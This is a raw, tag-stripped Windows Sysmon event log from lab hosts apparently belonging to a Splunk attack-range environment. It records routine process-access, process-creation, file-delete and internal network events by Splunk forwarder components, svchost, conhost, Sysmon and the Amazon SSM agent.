10:45:49.854{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-105D-6216-3904-000000003902}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-105D-6216-3904-000000003902}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.855{4F8D34B0-105D-6216-3904-000000003902}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22760E86203C593A8DF604564BFBF03F,SHA256=5FD5283A7705A9B1788C6A7AD5E5B9704915E6C983E2BCDCF2A82A96379EF7C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.557{4F8D34B0-105D-6216-3804-000000003902}14962368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-105D-6216-3804-000000003902}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-105D-6216-3804-000000003902}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.354{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-105D-6216-3804-000000003902}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.355{4F8D34B0-105D-6216-3804-000000003902}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000215820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.684{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51281-false10.0.1.12-8000- 23542300x8000000000000000215819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:50.662{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD1806059DAD09062C5252D46D280A8A,SHA256=7219D69A7FD28D99612360F57701C47E673C98A2D9DD324FDCB1628F5DD252DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:50.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ADAF1D4ECA102D8DCBCA8F9E22EA14C,SHA256=9262279607073CE2D41A35228CCA638686BD3D3D903FACAF128D3DE0EBCDD8BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:50.639{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-129MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:50.356{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8412B0A1E47CE399E51768C1F800136E,SHA256=A46C049DC5A5FBE0F4356A19A618384999F0EC397C298FF4B0285E489636117D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:50.073{4F8D34B0-105D-6216-3904-000000003902}35641812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:51.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717D7199F37CC659CFF5DA6DAE799A3D,SHA256=F0D4DE4309B44803BB4CDEC4C8DE1081136743372968A322406F50F7420AD16E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E9CCE17E88AC0AB92FD615FEF60CEE,SHA256=8DACB369BFF1454A1D3AA144D04733427C4D752DCF659C025040AD9F74675612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.649{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-130MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-105F-6216-3A04-000000003902}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 